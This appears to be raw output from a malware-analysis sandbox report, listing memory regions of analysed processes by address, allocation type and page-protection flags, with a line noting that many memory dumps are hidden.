page read and write
62D0000
trusted library allocation
page execute and read and write
6A75000
trusted library allocation
page read and write
5F40000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
798000
heap
page read and write
62E0000
trusted library allocation
page read and write
6300000
trusted library allocation
page read and write
1017A000
direct allocation
page read and write
63C0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
6310000
trusted library allocation
page read and write
3E83000
trusted library allocation
page read and write
7340000
trusted library allocation
page read and write
6270000
trusted library allocation
page read and write
6310000
trusted library allocation
page read and write
B319000
heap
page read and write
910000
trusted library allocation
page read and write
6C19000
trusted library allocation
page read and write
6A80000
trusted library allocation
page read and write
10FC000
stack
page read and write
6A75000
trusted library allocation
page read and write
6B90000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
7300000
trusted library allocation
page read and write
7570000
trusted library allocation
page read and write
63CE000
trusted library allocation
page read and write
2E5C000
stack
page read and write
7690000
trusted library allocation
page read and write
6A60000
unkown
page read and write
62C0000
trusted library allocation
page read and write
7340000
trusted library allocation
page read and write
317E000
stack
page read and write
5F40000
trusted library allocation
page read and write
7300000
trusted library allocation
page read and write
6A65000
trusted library allocation
page read and write
6A70000
trusted library allocation
page read and write
3500000
heap
page read and write
6270000
trusted library allocation
page read and write
20EA4326000
heap
page read and write
3280000
unkown
page read and write
62C0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
20EA3B7F000
heap
page read and write
72B0000
trusted library allocation
page read and write
7330000
trusted library allocation
page read and write
72B8000
trusted library allocation
page read and write
B33E000
heap
page read and write
D20000
heap
page read and write
6250000
trusted library allocation
page read and write
5C0000
trusted library allocation
page read and write
6A70000
unkown
page read and write
760000
unkown
page readonly
20EA3A89000
heap
page read and write
63B0000
trusted library allocation
page read and write
17285180000
heap
page read and write
105E000
stack
page read and write
6A90000
trusted library allocation
page read and write
3050000
trusted library allocation
page readonly
73A0000
trusted library allocation
page read and write
20EA3A7C000
heap
page read and write
7300000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
63C7000
trusted library allocation
page read and write
CD0000
remote allocation
page read and write
6270000
trusted library allocation
page read and write
62C0000
trusted library allocation
page read and write
6AF0000
trusted library allocation
page read and write
D50000
heap
page read and write
3DBA000
trusted library allocation
page read and write
6A65000
trusted library allocation
page read and write
35D0000
heap
page read and write
62C0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
70E0000
trusted library allocation
page read and write
20EA3B52000
heap
page read and write
23BC000
stack
page read and write
20542CA0000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
10AF000
stack
page read and write
20530C7B000
heap
page read and write
149A000
unkown
page write copy
63B5000
trusted library allocation
page read and write
63C0000
trusted library allocation
page execute and read and write
6270000
trusted library allocation
page read and write
20EA3A6B000
heap
page read and write
20EA4302000
heap
page read and write
20532760000
trusted library allocation
page read and write
590000
unkown
page readonly
6A60000
trusted library allocation
page read and write
6A80000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
32E0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
7309000
trusted library allocation
page read and write
3CDF000
trusted library allocation
page read and write
7440000
trusted library allocation
page read and write
20EA3B4B000
heap
page read and write
72B0000
trusted library allocation
page read and write
3140000
trusted library allocation
page read and write
9C0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
5EE6000
trusted library allocation
page read and write
6A70000
trusted library allocation
page read and write
20EA3A86000
heap
page read and write
7450000
trusted library allocation
page read and write
330E000
stack
page read and write
63F0000
trusted library allocation
page read and write
7350000
trusted library allocation
page read and write
DCFB000
stack
page read and write
7FF9A5A06000
trusted library allocation
page read and write
71F0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
2310000
heap
page read and write
5F40000
trusted library allocation
page read and write
5E70000
trusted library allocation
page read and write
63C0000
unkown
page read and write
1DBFD4F8000
heap
page read and write
7150000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
6A67000
trusted library allocation
page read and write
20EA3B66000
heap
page read and write
ABA3000
stack
page read and write
870000
heap
page read and write
3230000
trusted library allocation
page read and write
2C814631000
heap
page read and write
63B0000
unkown
page read and write
344F000
stack
page read and write
6A70000
trusted library allocation
page read and write
7FF9A5C90000
trusted library allocation
page read and write
427000
unkown
page readonly
6A70000
trusted library allocation
page read and write
72E0000
trusted library allocation
page execute and read and write
20532C70000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
20EA3BA0000
heap
page read and write
20EA4358000
heap
page read and write
20530D26000
heap
page read and write
6ADE000
stack
page read and write
6270000
trusted library allocation
page read and write
BD0000
heap
page read and write
63B8000
trusted library allocation
page read and write
6285000
trusted library allocation
page read and write
20530FC0000
heap
page readonly
63C0000
trusted library allocation
page read and write
62B0000
trusted library allocation
page read and write
6A60000
unkown
page read and write
6A70000
trusted library allocation
page read and write
7330000
trusted library allocation
page read and write
6270000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
72F0000
trusted library allocation
page read and write
7FF9A5B60000
trusted library allocation
page read and write
20EA3A84000
heap
page read and write
7300000
trusted library allocation
page read and write
63E0000
trusted library allocation
page read and write
63C0000
unkown
page read and write
730A000
trusted library allocation
page read and write
109F000
stack
page read and write
20EA3B31000
heap
page read and write
72A0000
trusted library allocation
page read and write
7160000
trusted library allocation
page read and write
72D0000
trusted library allocation
page read and write
20EA3A5B000
heap
page read and write
6A69000
trusted library allocation
page read and write
20EA3BD0000
heap
page read and write
6A90000
trusted library allocation
page read and write
BE0000
trusted library allocation
page read and write
5F20000
trusted library allocation
page read and write
7140000
trusted library allocation
page read and write
7300000
trusted library allocation
page read and write
20EA43A7000
heap
page read and write
2F7F000
stack
page read and write
30A8000
heap
page read and write
20EA3B6B000
heap
page read and write
72B0000
trusted library allocation
page read and write
72D0000
trusted library allocation
page read and write
20EA3BA2000
heap
page read and write
716A000
unkown
page read and write
7640000
trusted library allocation
page read and write
4E0000
remote allocation
page read and write
6270000
trusted library allocation
page read and write
33E2000
heap
page read and write
63C0000
trusted library allocation
page read and write
20532620000
trusted library allocation
page read and write
20EA4387000
heap
page read and write
74E000
stack
page read and write
13A1000
unkown
page execute read
A20000
remote allocation
page read and write
D50000
unkown
page read and write
420000
unkown
page read and write
6A90000
trusted library allocation
page read and write
1DBFD4D0000
heap
page read and write
5F20000
trusted library allocation
page read and write
930000
heap
page read and write
298B000
heap
page read and write
20EA3BF4000
heap
page read and write
20EA441B000
heap
page read and write
7150000
trusted library allocation
page read and write
20EA3AD7000
heap
page read and write
3EE2000
trusted library allocation
page read and write
6290000
trusted library allocation
page read and write
510000
heap
page read and write
6A90000
trusted library allocation
page read and write
7120000
trusted library allocation
page read and write
B374000
heap
page read and write
7FF9A5BF0000
trusted library allocation
page read and write
72C0000
trusted library allocation
page read and write
3F56000
trusted library allocation
page read and write
20EA3AEB000
heap
page read and write
55A687F000
stack
page read and write
2FE0000
unkown
page readonly
20EA3B46000
heap
page read and write
72D0000
trusted library allocation
page read and write
7310000
trusted library allocation
page read and write
83E000
stack
page read and write
2C81463F000
heap
page read and write
6A67000
unkown
page read and write
63B0000
trusted library allocation
page read and write
20542E32000
trusted library allocation
page read and write
6270000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
20EA437F000
heap
page read and write
20EA436F000
heap
page read and write
ABC2000
stack
page read and write
6AA0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
20EA3B9F000
heap
page read and write
7320000
trusted library allocation
page read and write
CDE000
stack
page read and write
62B0000
trusted library allocation
page read and write
3500000
heap
page read and write
5E60000
trusted library allocation
page read and write
756F000
trusted library allocation
page read and write
1F0000
trusted library allocation
page read and write
7440000
trusted library allocation
page read and write
32CE000
stack
page read and write
63C0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
62E0000
trusted library allocation
page read and write
6270000
trusted library allocation
page read and write
7430000
trusted library allocation
page read and write
63B0000
trusted library allocation
page read and write
62B0000
trusted library allocation
page read and write
32C0000
heap
page read and write
63CA000
trusted library allocation
page read and write
6A60000
unkown
page read and write
20EA3AA5000
heap
page read and write
33E6000
heap
page read and write
EAC000
stack
page read and write
1040000
remote allocation
page read and write
7350000
trusted library allocation
page read and write
63C6000
trusted library allocation
page read and write
20EA3B5E000
heap
page read and write
C80000
unkown
page readonly
420000
unkown
page read and write
1336000
heap
page read and write
580000
unkown
page readonly
20EA3BEF000
heap
page read and write
20EA3BDA000
heap
page read and write
20EA3A6F000
heap
page read and write
70E0000
trusted library allocation
page execute and read and write
62C0000
trusted library allocation
page read and write
20EA3BC2000
heap
page read and write
6A65000
trusted library allocation
page read and write
320000
heap
page read and write
7730000
trusted library allocation
page read and write
DDD000
stack
page read and write
B305000
heap
page read and write
7310000
trusted library allocation
page read and write
16D000
stack
page read and write
7380000
trusted library allocation
page read and write
62E0000
trusted library allocation
page read and write
3210000
trusted library allocation
page read and write
5EE0000
trusted library allocation
page read and write
DA0000
heap
page read and write
20532C60000
trusted library allocation
page read and write
57C000
stack
page read and write
20530F90000
trusted library allocation
page read and write
7300000
trusted library allocation
page read and write
62E0000
trusted library allocation
page read and write
6A70000
trusted library allocation
page read and write
6C27000
trusted library allocation
page read and write
6290000
trusted library allocation
page read and write
7300000
trusted library allocation
page read and write
5EE0000
trusted library allocation
page read and write
6A60000
unkown
page read and write
3D95000
trusted library allocation
page read and write
63B0000
trusted library allocation
page read and write
7FF9A5CB0000
trusted library allocation
page read and write
73B0000
trusted library allocation
page read and write
10DF000
stack
page read and write
7140000
trusted library allocation
page read and write
2FB0000
heap
page read and write
63B0000
trusted library allocation
page read and write
63C0000
unkown
page read and write
72BB000
trusted library allocation
page read and write
E0E000
stack
page read and write
62C0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
7DF466C90000
trusted library allocation
page execute and read and write
20EA3B68000
heap
page read and write
72B0000
trusted library allocation
page read and write
20EA3A5E000
heap
page read and write
20EA3A93000
heap
page read and write
7180000
trusted library allocation
page read and write
62E0000
trusted library allocation
page read and write
6A90000
trusted library allocation
page read and write
6A90000
trusted library allocation
page read and write
62A0000
trusted library allocation
page read and write
3A60000
trusted library allocation
page read and write
6A70000
trusted library allocation
page read and write
6BF1000
trusted library allocation
page read and write
6270000
trusted library allocation
page read and write
ECE000
stack
page read and write
20533C91000
trusted library allocation
page read and write
9E0000
remote allocation
page read and write
20EA4306000
heap
page read and write
57E000
stack
page read and write
70F0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
5EE0000
trusted library allocation
page read and write
7140000
trusted library allocation
page read and write
63B0000
trusted library allocation
page read and write
770000
unkown
page read and write
63C0000
trusted library allocation
page read and write
930000
heap
page read and write
F9B80FE000
stack
page read and write
32F0000
heap
page read and write
20EA3B3D000
heap
page read and write
1230000
heap
page read and write
72B0000
trusted library allocation
page read and write
55A6AFD000
stack
page read and write
63B0000
unkown
page read and write
327D000
stack
page read and write
5EE0000
trusted library allocation
page read and write
6BD7000
trusted library allocation
page read and write
7FB000
stack
page read and write
5E0000
trusted library allocation
page read and write
74BF000
stack
page read and write
20EA4AE0000
remote allocation
page read and write
97F000
stack
page read and write
6A75000
trusted library allocation
page read and write
1DF8CB00000
heap
page read and write
62A0000
trusted library allocation
page read and write
D79000
unkown
page read and write
EDCA63B000
stack
page read and write
6C0B000
trusted library allocation
page read and write
7618000
trusted library allocation
page read and write
7FF9A5C70000
trusted library allocation
page read and write
6A90000
trusted library allocation
page read and write
6270000
trusted library allocation
page read and write
3380000
heap
page read and write
20EA440E000
heap
page read and write
7350000
trusted library allocation
page read and write
6B30000
trusted library allocation
page read and write
2054AD50000
heap
page read and write
6290000
trusted library allocation
page read and write
7560000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
5F30000
trusted library allocation
page read and write
9D0000
heap
page read and write
6A65000
unkown
page read and write
50D000
stack
page read and write
10B0000
heap
page read and write
6270000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
7150000
trusted library allocation
page read and write
6A75000
trusted library allocation
page read and write
6150000
heap
page read and write
6A60000
trusted library allocation
page read and write
2054B0F0000
trusted library allocation
page read and write
20EA3A6C000
heap
page read and write
7561000
trusted library allocation
page read and write
5EE0000
trusted library allocation
page read and write
D7F000
stack
page read and write
33C0000
heap
page read and write
6300000
trusted library allocation
page read and write
20EA3B38000
heap
page read and write
7FF9A5AF6000
trusted library allocation
page read and write
32FC000
heap
page read and write
72D0000
trusted library allocation
page read and write
1040000
remote allocation
page read and write
6A70000
trusted library allocation
page read and write
BF0000
heap
page read and write
20532760000
trusted library allocation
page read and write
72E0000
trusted library allocation
page read and write
62A0000
trusted library allocation
page read and write
20EA3B6D000
heap
page read and write
6A80000
trusted library allocation
page read and write
72A0000
trusted library allocation
page read and write
B319000
heap
page read and write
7620000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
63B0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
31FF000
stack
page read and write
86D000
stack
page read and write
20EA3AE3000
heap
page read and write
62F0000
trusted library allocation
page read and write
7320000
trusted library allocation
page read and write
7430000
trusted library allocation
page read and write
F7D000
stack
page read and write
276F000
stack
page read and write
7630000
trusted library allocation
page read and write
82101FE000
stack
page read and write
3ECF000
trusted library allocation
page read and write
7150000
trusted library allocation
page read and write
401000
unkown
page execute read
20EA3B8D000
heap
page read and write
20530CE5000
heap
page read and write
41B000
unkown
page readonly
63B0000
trusted library allocation
page read and write
62A0000
trusted library allocation
page read and write
1A3B000
unkown
page write copy
6BE0000
trusted library allocation
page read and write
7370000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
62F0000
trusted library allocation
page read and write
400000
unkown
page readonly
DDD000
stack
page read and write
B28A000
heap
page read and write
1040000
remote allocation
page read and write
72B0000
trusted library allocation
page read and write
63C6000
unkown
page read and write
62C0000
trusted library allocation
page read and write
17285C02000
trusted library allocation
page read and write
2054B0C0000
trusted library allocation
page read and write
6270000
trusted library allocation
page read and write
30EE000
heap
page read and write
82100F9000
stack
page read and write
31B8000
trusted library allocation
page read and write
5E70000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
319E000
stack
page read and write
6A60000
trusted library allocation
page read and write
62A0000
trusted library allocation
page read and write
20EA3A8B000
heap
page read and write
67A000
heap
page read and write
30F4000
heap
page read and write
20EA3B8A000
heap
page read and write
63C4000
trusted library allocation
page read and write
A9E000
stack
page read and write
20532760000
heap
page execute and read and write
5F40000
trusted library allocation
page read and write
6A70000
trusted library allocation
page read and write
B01E000
heap
page read and write
20EA3BF7000
heap
page read and write
5F40000
trusted library allocation
page read and write
E90000
heap
page read and write
DAC0000
trusted library allocation
page read and write
91C000
stack
page read and write
76C0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
1DF8CB40000
heap
page read and write
6260000
trusted library allocation
page read and write
7330000
trusted library allocation
page read and write
7156000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
2EC0000
unkown
page read and write
7320000
trusted library allocation
page read and write
237D000
stack
page read and write
63A0000
trusted library allocation
page read and write
EDC9FFE000
stack
page read and write
2129000
trusted library allocation
page read and write
72D0000
trusted library allocation
page read and write
639E000
stack
page read and write
62C4000
trusted library allocation
page read and write
363F000
stack
page read and write
7310000
trusted library allocation
page execute and read and write
20530C92000
heap
page read and write
62E0000
trusted library allocation
page read and write
20EA3B4D000
heap
page read and write
6A60000
trusted library allocation
page read and write
6A90000
trusted library allocation
page read and write
63B0000
trusted library allocation
page read and write
1080000
trusted library allocation
page read and write
6A70000
trusted library allocation
page read and write
20EA3B85000
heap
page read and write
6A70000
trusted library allocation
page read and write
17285A90000
trusted library allocation
page read and write
6270000
trusted library allocation
page read and write
327A000
stack
page read and write
7330000
trusted library allocation
page read and write
600000
heap
page read and write
B335000
heap
page read and write
70E0000
trusted library allocation
page read and write
20EA3AED000
heap
page read and write
7FF9A5A70000
trusted library allocation
page execute and read and write
72B0000
trusted library allocation
page read and write
3D87000
trusted library allocation
page read and write
33D0000
trusted library allocation
page read and write
30F6000
heap
page read and write
62B0000
trusted library allocation
page read and write
DBFC000
stack
page read and write
20EA3AE5000
heap
page read and write
657000
heap
page read and write
63C0000
unkown
page read and write
63C0000
trusted library allocation
page read and write
20530CF3000
heap
page read and write
340E000
stack
page read and write
7330000
trusted library allocation
page execute and read and write
8FF000
stack
page read and write
6A77000
trusted library allocation
page read and write
20EA3BB5000
heap
page read and write
63B0000
trusted library allocation
page read and write
63B5000
trusted library allocation
page read and write
6300000
trusted library allocation
page read and write
AA42000
unkown
page read and write
3900000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
6A60000
unkown
page read and write
103C000
stack
page read and write
6A70000
trusted library allocation
page read and write
20EA3B28000
heap
page read and write
20EA3B7C000
heap
page read and write
8B0000
heap
page read and write
5EE0000
trusted library allocation
page read and write
7150000
trusted library allocation
page read and write
7630000
unkown
page read and write
20EA3ABA000
heap
page read and write
72D0000
trusted library allocation
page read and write
BB0000
heap
page read and write
317E000
stack
page read and write
317E000
stack
page read and write
7300000
trusted library allocation
page read and write
20EA3B43000
heap
page read and write
6330000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
6270000
trusted library allocation
page read and write
8D0000
remote allocation
page read and write
63C0000
unkown
page read and write
EDCA1FE000
stack
page read and write
7370000
trusted library allocation
page read and write
63A6000
trusted library allocation
page read and write
3280000
unkown
page read and write
3220000
trusted library allocation
page execute and read and write
6A60000
unkown
page read and write
20EA3BFC000
heap
page read and write
6A60000
trusted library allocation
page read and write
7310000
trusted library allocation
page read and write
3290000
trusted library allocation
page read and write
7150000
trusted library allocation
page read and write
62F0000
trusted library allocation
page read and write
20EA3AD4000
heap
page read and write
A655B3F000
stack
page read and write
7330000
trusted library allocation
page read and write
7D0000
remote allocation
page read and write
3C6C000
trusted library allocation
page read and write
63C5000
trusted library allocation
page read and write
7180000
trusted library allocation
page read and write
7190000
trusted library allocation
page execute and read and write
7FF9A5953000
trusted library allocation
page execute and read and write
3CBF000
trusted library allocation
page read and write
5EE0000
trusted library allocation
page read and write
3A65000
trusted library allocation
page read and write
7315000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
FE0000
remote allocation
page read and write
7150000
trusted library allocation
page read and write
AF0000
heap
page read and write
4E0000
remote allocation
page read and write
63B5000
trusted library allocation
page read and write
3270000
heap
page read and write
3148000
heap
page read and write
5E90000
trusted library allocation
page read and write
71D0000
trusted library allocation
page read and write
2EA0000
unkown
page readonly
7FF9A5AF2000
trusted library allocation
page read and write
422000
unkown
page write copy
AF8E000
stack
page read and write
3DA9000
trusted library allocation
page read and write
F3F000
stack
page read and write
B368000
heap
page read and write
6A60000
trusted library allocation
page read and write
19C000
stack
page read and write
AFDA000
heap
page read and write
821047F000
stack
page read and write
20EA3B19000
heap
page read and write
73E8000
trusted library allocation
page read and write
C5F000
stack
page read and write
6A70000
trusted library allocation
page read and write
620000
heap
page read and write
6A67000
trusted library allocation
page read and write
5EE0000
trusted library allocation
page read and write
3D1E000
trusted library allocation
page read and write
2054AD5C000
heap
page read and write
10B0000
trusted library allocation
page read and write
2054B0E0000
trusted library allocation
page read and write
6A80000
trusted library allocation
page read and write
530000
heap
page read and write
72C0000
trusted library allocation
page read and write
1DBFD4FC000
heap
page read and write
D40000
unkown
page readonly
3241000
trusted library allocation
page read and write
62B0000
trusted library allocation
page read and write
63B0000
unkown
page read and write
3CEB000
trusted library allocation
page read and write
6A70000
trusted library allocation
page read and write
6AD0000
trusted library allocation
page read and write
10B54000
direct allocation
page read and write
62C0000
trusted library allocation
page read and write
6270000
trusted library allocation
page read and write
7480000
trusted library allocation
page read and write
5F2F000
trusted library allocation
page read and write
72D0000
trusted library allocation
page read and write
7100000
trusted library allocation
page read and write
7170000
trusted library allocation
page read and write
C4F000
stack
page read and write
7170000
trusted library allocation
page read and write
20533A17000
trusted library allocation
page read and write
6270000
trusted library allocation
page read and write
2054AF14000
heap
page read and write
850000
heap
page read and write
1DBFEEF0000
heap
page read and write
6A70000
trusted library allocation
page read and write
20EA3A00000
heap
page read and write
2C814702000
heap
page read and write
17285229000
heap
page read and write
6307000
trusted library allocation
page read and write
6277000
trusted library allocation
page read and write
7110000
trusted library allocation
page read and write
62C0000
trusted library allocation
page read and write
2054AED0000
heap
page read and write
63C4000
unkown
page read and write
7F0000
heap
page read and write
74A0000
trusted library allocation
page read and write
5EE000
stack
page read and write
7FF9A5C20000
trusted library allocation
page read and write
2EA0000
unkown
page readonly
20EA3B58000
heap
page read and write
72B0000
trusted library allocation
page read and write
62C0000
trusted library allocation
page read and write
62C0000
trusted library allocation
page read and write
B305000
heap
page read and write
A5E000
stack
page read and write
6AB0000
trusted library allocation
page read and write
62E0000
trusted library allocation
page read and write
6A90000
trusted library allocation
page read and write
6A90000
trusted library allocation
page read and write
7110000
trusted library allocation
page read and write
63C5000
trusted library allocation
page read and write
2054ACF0000
heap
page read and write
B2BF000
heap
page read and write
6A75000
trusted library allocation
page read and write
20EA3AAD000
heap
page read and write
63C0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
6A90000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
7120000
trusted library allocation
page read and write
1DF8C9C0000
heap
page read and write
10BD000
stack
page read and write
63C0000
trusted library allocation
page read and write
6A90000
trusted library allocation
page read and write
34D0000
heap
page read and write
4AE8000
trusted library allocation
page read and write
7330000
trusted library allocation
page read and write
2054B0D0000
trusted library allocation
page read and write
AA0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
1330000
heap
page read and write
7140000
trusted library allocation
page read and write
5EE0000
trusted library allocation
page read and write
3388000
heap
page read and write
20EA3B9E000
heap
page read and write
73C0000
trusted library allocation
page read and write
3F76000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
20EA3ACB000
heap
page read and write
5EE0000
trusted library allocation
page read and write
6BFE000
trusted library allocation
page read and write
6320000
trusted library allocation
page read and write
62E0000
trusted library allocation
page read and write
63C5000
trusted library allocation
page read and write
4DB000
stack
page read and write
B31B000
heap
page read and write
6A60000
trusted library allocation
page read and write
3F17000
trusted library allocation
page read and write
7FF9A5C40000
trusted library allocation
page read and write
7320000
trusted library allocation
page read and write
4AB9000
trusted library allocation
page read and write
2BF0000
heap
page read and write
8D0000
remote allocation
page read and write
76B0000
trusted library allocation
page read and write
20533C89000
trusted library allocation
page read and write
650000
heap
page read and write
7BD000
stack
page read and write
D00000
heap
page read and write
72B0000
trusted library allocation
page read and write
7420000
trusted library allocation
page read and write
63C5000
unkown
page read and write
7141000
trusted library allocation
page read and write
6300000
trusted library allocation
page read and write
6300000
trusted library allocation
page read and write
EDC9E75000
stack
page read and write
109C000
stack
page read and write
BAF000
stack
page read and write
6C03000
trusted library allocation
page read and write
570000
heap
page read and write
63C0000
trusted library allocation
page read and write
6BA2000
trusted library allocation
page read and write
5E60000
trusted library allocation
page read and write
1F11000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
63B0000
trusted library allocation
page read and write
74D0000
trusted library allocation
page read and write
20EA3BAC000
heap
page read and write
F9B7FFF000
stack
page read and write
3E70000
trusted library allocation
page read and write
5EE6000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
20EA3A88000
heap
page read and write
20EA3AF4000
heap
page read and write
272E000
stack
page read and write
2053392A000
trusted library allocation
page read and write
20EA4378000
heap
page read and write
6A0000
heap
page read and write
5F20000
trusted library allocation
page read and write
63C8000
trusted library allocation
page read and write
D8D000
stack
page read and write
3C9F000
trusted library allocation
page read and write
8CF000
stack
page read and write
3C21000
trusted library allocation
page read and write
6A90000
trusted library allocation
page read and write
62E0000
trusted library allocation
page read and write
2F80000
trusted library allocation
page read and write
58F000
stack
page read and write
3648000
heap
page read and write
63C0000
unkown
page read and write
20EA3B6F000
heap
page read and write
6270000
trusted library allocation
page read and write
20EA3BF0000
heap
page read and write
20EA3A68000
heap
page read and write
5F30000
trusted library allocation
page read and write
There are 2889 hidden memdumps, click here to show them.